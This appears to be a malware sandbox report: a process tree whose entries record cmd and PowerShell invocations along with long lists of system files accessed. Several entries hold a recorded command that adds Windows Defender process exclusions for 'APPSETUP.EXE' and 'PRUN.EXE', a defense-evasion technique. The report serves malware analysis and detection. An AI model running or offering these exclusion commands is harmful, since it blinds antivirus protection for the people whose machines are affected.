C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CULTURE.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORRC.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.XML\461D3B6B3F43E6FBE6C897D5936E17E4\SYSTEM.XML.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.XML\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT\6F3B99ED0B791FF4D8AA52F2F0CD0BCF\SYSTEM.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DIRECTORYSER#\45EC12795950A7D54691591C615A9E3C\SYSTEM.DIRECTORYSERVICES.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.DIRECTORYSERVICES\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\SYSWOW64\SHFOLDER.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\GETEVENT.TYPES.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\TYPES.PS1XML
C:\WINDOWS\SYSWOW64\TZRES.DLL
C:\WINDOWS\SYSWOW64\EN-US\TZRES.DLL.MUI
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DIAGNOSTICS.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\WSMAN.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\CERTIFICATE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DOTNETTYPES.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\FILESYSTEM.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\HELP.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLCORE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLTRACE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\REGISTRY.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\SECUR32.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DATA\1E85062785E286CD9EAE9C26D2C61F73\SYSTEM.DATA.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.DATA\2.0.0.0__B77A5C561934E089\SYSTEM.DATA.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORJIT.DLL
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\PROGRAM FILES\NODEJS
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\PROGRAMS\PYTHON\PYTHON37\SCRIPTS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\NPM
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\DIASYMREADER.DLL
C:\WINDOWS\SYSWOW64\NETUTILS.DLL
1968
Image path
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'APPSETUP.EXE'"
Time lapse
1.476406
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\WINBRAND.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\EN-US\CMD.EXE.MUI
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSTEM32\IMM32.DLL
C:\WINDOWS\SYSTEM32\EN-US\RUNDLL32.EXE.MUI
C:\WINDOWS\SYSTEM32\DFDTS.DLL
C:\WINDOWS\SYSTEM32\RUNDLL32.EXE
C:\WINDOWS\SYSTEM32\SECHOST.DLL
C:\WINDOWS\SYSTEM32\WDI.DLL
C:\WINDOWS\SYSTEM32\EN-US\SETUPAPI.DLL.MUI
Process children
2576
Image path
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'APPSETUP.EXE'"
Time lapse
1.690616
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\ATL.DLL
C:\WINDOWS\SYSWOW64\MSCOREE.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\EN-US\POWERSHELL.EXE.MUI
C:\WINDOWS\SYSWOW64\UXTHEME.DLL
C:\WINDOWS\REGISTRATION\R000000000006.CLB
C:\WINDOWS\SYSWOW64\SHELL32.DLL
C:\WINDOWS\SYSWOW64\USERENV.DLL
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_41E6975E2BD6F2B2\COMCTL32.DLL
C:\WINDOWS\WINDOWSSHELL.MANIFEST
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\PROPSYS.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\CVERSIONS.1.DB
C:\WINDOWS\SYSWOW64\NTMARTA.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.VER0X0000000000000001.DB
C:\USERS\DESKTOP.INI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\USERS\ADMINISTRATOR\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SHELL32.DLL.MUI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SETUPAPI.DLL.MUI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\SYSWOW64\GAMEUX.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSWOW64\EN-US\GAMEUX.DLL.MUI
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_72D18A4386696C80\GDIPLUS.DLL
C:\WINDOWS\SYSWOW64\XMLLITE.DLL
C:\WINDOWS\SYSWOW64\WER.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\DESKTOP.INI
C:\WINDOWS\SYSWOW64\SHDOCVW.DLL
C:\WINDOWS\SYSWOW64\EN-US\SHDOCVW.DLL.MUI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\DESKTOP.INI
C:\WINDOWS\SYSWOW64\LINKINFO.DLL
C:\WINDOWS\SYSWOW64\NTSHRUI.DLL
C:\WINDOWS\SYSWOW64\SRVCLI.DLL
C:\WINDOWS\SYSWOW64\CSCAPI.DLL
C:\WINDOWS\SYSWOW64\SLC.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\WINDOWS POWERSHELL.LNK
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL_ISE.EXE
C:\WINDOWS\HH.EXE
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\RSAENH.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\JGRNUS9P3WSM6KU1PKW0.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFA784.TMP
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\MSCOREEI.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORWKS.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CLR.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.VC80.CRT_1FC8B3B9A1E18E3B_8.0.50727.4940_NONE_D08CC06A442B34FC\MSVCR80.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CONFIG\MACHINE.CONFIG
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\INDEX149.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MSCORLIB\62A0B3E4B40EC0E8C5CFAA0C8848E64A\MSCORLIB.NI.DLL
C:\WINDOWS\ASSEMBLY\PUBPOL25.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM\9E0A3B9B9F457233A335D7FBA8F95419\SYSTEM.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\B1C511D8FAD78AD3C5213B2B4FB02B8B\MICROSOFT.POWERSHELL.CONSOLEHOST.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.CONSOLEHOST\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT.AUTOMATION\1.0.0.0__31BF3856AD364E35\SYSTEM.MANAGEMENT.AUTOMATION.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT.A#\4436815B432C313255AF322F4EC3560D\SYSTEM.MANAGEMENT.AUTOMATION.NI.DLL
C:\WINDOWS\SYSWOW64\VERSION.DLL
C:\WINDOWS\SYSWOW64\L_INTL.NLS
C:\WINDOWS\SYSWOW64\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTTBLS.NLP
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTKEY.NLP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CORE\FBC05B5B05DC6366B02B8E2F77D080F1\SYSTEM.CORE.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\4F68CD04686E5DC5A55070D112D44BDF\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CORE\3.5.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CONFIGURATIO#\F02737C83305687A68C088927A6C5A98\SYSTEM.CONFIGURATION.INSTALL.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CONFIGURATION.INSTALL\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.WSMAN.MAN#\EE28A075665B6BC23B6DAE56903D431D\MICROSOFT.WSMAN.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.RUNTIME\1.0.0.0__31BF3856AD364E35\MICROSOFT.WSMAN.RUNTIME.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.TRANSACTIONS\AD18F93FC713DB2C4B29B25116C13BD8\SYSTEM.TRANSACTIONS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.TRANSACTIONS\2.0.0.0__B77A5C561934E089\SYSTEM.TRANSACTIONS.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\3008A05E2928E2C1D856CC34E0422C17\MICROSOFT.POWERSHELL.COMMANDS.UTILITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.UTILITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8DF695FB80187F65208D87229E81E8A2\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8CE205027E30804D1B2DEAFFA0582735\MICROSOFT.POWERSHELL.SECURITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.SECURITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CULTURE.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORRC.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.XML\461D3B6B3F43E6FBE6C897D5936E17E4\SYSTEM.XML.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.XML\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT\6F3B99ED0B791FF4D8AA52F2F0CD0BCF\SYSTEM.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DIRECTORYSER#\45EC12795950A7D54691591C615A9E3C\SYSTEM.DIRECTORYSERVICES.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.DIRECTORYSERVICES\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\SYSWOW64\SHFOLDER.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\GETEVENT.TYPES.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\TYPES.PS1XML
C:\WINDOWS\SYSWOW64\TZRES.DLL
C:\WINDOWS\SYSWOW64\EN-US\TZRES.DLL.MUI
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DIAGNOSTICS.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\WSMAN.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\CERTIFICATE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DOTNETTYPES.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\FILESYSTEM.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\HELP.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLCORE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLTRACE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\REGISTRY.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\SECUR32.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DATA\1E85062785E286CD9EAE9C26D2C61F73\SYSTEM.DATA.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.DATA\2.0.0.0__B77A5C561934E089\SYSTEM.DATA.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORJIT.DLL
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\PROGRAM FILES\NODEJS
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\PROGRAMS\PYTHON\PYTHON37\SCRIPTS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\NPM
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\DIASYMREADER.DLL
C:\WINDOWS\SYSWOW64\NETUTILS.DLL
1184
Image path
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'PRUN.EXE'"
Time lapse
1.571611
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\WINBRAND.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\EN-US\CMD.EXE.MUI
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
Process children
2796
Image path
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'PRUN.EXE'"
Time lapse
1.973024
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\ATL.DLL
C:\WINDOWS\SYSWOW64\MSCOREE.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\EN-US\POWERSHELL.EXE.MUI
C:\WINDOWS\SYSWOW64\UXTHEME.DLL
C:\WINDOWS\REGISTRATION\R000000000006.CLB
C:\WINDOWS\SYSWOW64\SHELL32.DLL
C:\WINDOWS\SYSWOW64\USERENV.DLL
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_41E6975E2BD6F2B2\COMCTL32.DLL
C:\WINDOWS\WINDOWSSHELL.MANIFEST
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\PROPSYS.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\CVERSIONS.1.DB
C:\WINDOWS\SYSWOW64\NTMARTA.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.VER0X0000000000000001.DB
C:\USERS\DESKTOP.INI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\USERS\ADMINISTRATOR\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SHELL32.DLL.MUI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SETUPAPI.DLL.MUI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\SYSWOW64\GAMEUX.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSWOW64\EN-US\GAMEUX.DLL.MUI
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_72D18A4386696C80\GDIPLUS.DLL
C:\WINDOWS\SYSWOW64\XMLLITE.DLL
C:\WINDOWS\SYSWOW64\WER.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\DESKTOP.INI
C:\WINDOWS\SYSWOW64\SHDOCVW.DLL
C:\WINDOWS\SYSWOW64\EN-US\SHDOCVW.DLL.MUI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\DESKTOP.INI
C:\WINDOWS\SYSWOW64\LINKINFO.DLL
C:\WINDOWS\SYSWOW64\NTSHRUI.DLL
C:\WINDOWS\SYSWOW64\SRVCLI.DLL
C:\WINDOWS\SYSWOW64\CSCAPI.DLL
C:\WINDOWS\SYSWOW64\SLC.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\WINDOWS POWERSHELL.LNK
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL_ISE.EXE
C:\WINDOWS\HH.EXE
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\RSAENH.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\94IYE447TS3OVIVOFHLI.TEMP
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\MSCOREEI.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORWKS.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CLR.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.VC80.CRT_1FC8B3B9A1E18E3B_8.0.50727.4940_NONE_D08CC06A442B34FC\MSVCR80.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CONFIG\MACHINE.CONFIG
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\INDEX149.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MSCORLIB\62A0B3E4B40EC0E8C5CFAA0C8848E64A\MSCORLIB.NI.DLL
C:\WINDOWS\ASSEMBLY\PUBPOL25.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM\9E0A3B9B9F457233A335D7FBA8F95419\SYSTEM.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\B1C511D8FAD78AD3C5213B2B4FB02B8B\MICROSOFT.POWERSHELL.CONSOLEHOST.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.CONSOLEHOST\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT.AUTOMATION\1.0.0.0__31BF3856AD364E35\SYSTEM.MANAGEMENT.AUTOMATION.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT.A#\4436815B432C313255AF322F4EC3560D\SYSTEM.MANAGEMENT.AUTOMATION.NI.DLL
C:\WINDOWS\SYSWOW64\VERSION.DLL
C:\WINDOWS\SYSWOW64\L_INTL.NLS
C:\WINDOWS\SYSWOW64\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTTBLS.NLP
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTKEY.NLP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CORE\FBC05B5B05DC6366B02B8E2F77D080F1\SYSTEM.CORE.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\4F68CD04686E5DC5A55070D112D44BDF\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CORE\3.5.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CONFIGURATIO#\F02737C83305687A68C088927A6C5A98\SYSTEM.CONFIGURATION.INSTALL.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CONFIGURATION.INSTALL\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.WSMAN.MAN#\EE28A075665B6BC23B6DAE56903D431D\MICROSOFT.WSMAN.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.RUNTIME\1.0.0.0__31BF3856AD364E35\MICROSOFT.WSMAN.RUNTIME.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.TRANSACTIONS\AD18F93FC713DB2C4B29B25116C13BD8\SYSTEM.TRANSACTIONS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.TRANSACTIONS\2.0.0.0__B77A5C561934E089\SYSTEM.TRANSACTIONS.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\3008A05E2928E2C1D856CC34E0422C17\MICROSOFT.POWERSHELL.COMMANDS.UTILITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.UTILITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8DF695FB80187F65208D87229E81E8A2\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8CE205027E30804D1B2DEAFFA0582735\MICROSOFT.POWERSHELL.SECURITY.NI.DLL
